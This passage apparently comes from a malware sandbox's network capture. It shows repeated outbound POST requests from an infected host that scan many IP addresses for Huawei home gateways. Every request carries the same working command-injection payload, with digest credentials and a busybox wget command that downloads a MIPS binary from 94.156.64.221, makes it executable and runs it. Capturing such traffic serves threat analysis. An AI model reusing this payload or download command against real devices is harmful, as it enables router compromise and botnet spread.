74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    342192.168.2.2343694156.95.177.4737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274864912 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    343192.168.2.2346990156.108.83.19637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274915934 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    344192.168.2.2350200197.17.222.15637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274950027 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    345192.168.2.2339966197.239.222.8137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.274985075 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    346192.168.2.235224641.73.11.12537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275028944 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    347192.168.2.2351176156.148.74.16337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275058031 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    348192.168.2.234921841.27.121.6737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275098085 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    349192.168.2.2339124156.191.243.9637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275135040 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    350192.168.2.2358472156.240.30.19137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275163889 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    351192.168.2.2332910197.236.18.22537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275211096 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    352192.168.2.2354080197.126.107.5937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275250912 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
